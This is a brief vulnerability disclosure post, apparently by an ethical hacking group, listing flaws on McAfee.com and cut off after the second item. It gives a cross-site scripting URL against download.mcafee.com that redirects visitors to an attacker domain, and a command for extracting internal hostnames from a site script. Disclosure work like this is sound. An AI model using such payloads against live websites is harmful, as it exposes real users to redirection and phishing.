Posted by YGN Ethical Hacker Group on Mar 27
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
-> Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace(‘attacker.in’)
-> Information Disclosure > Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
->…
Source: Vulnerabilities in *McAfee.com




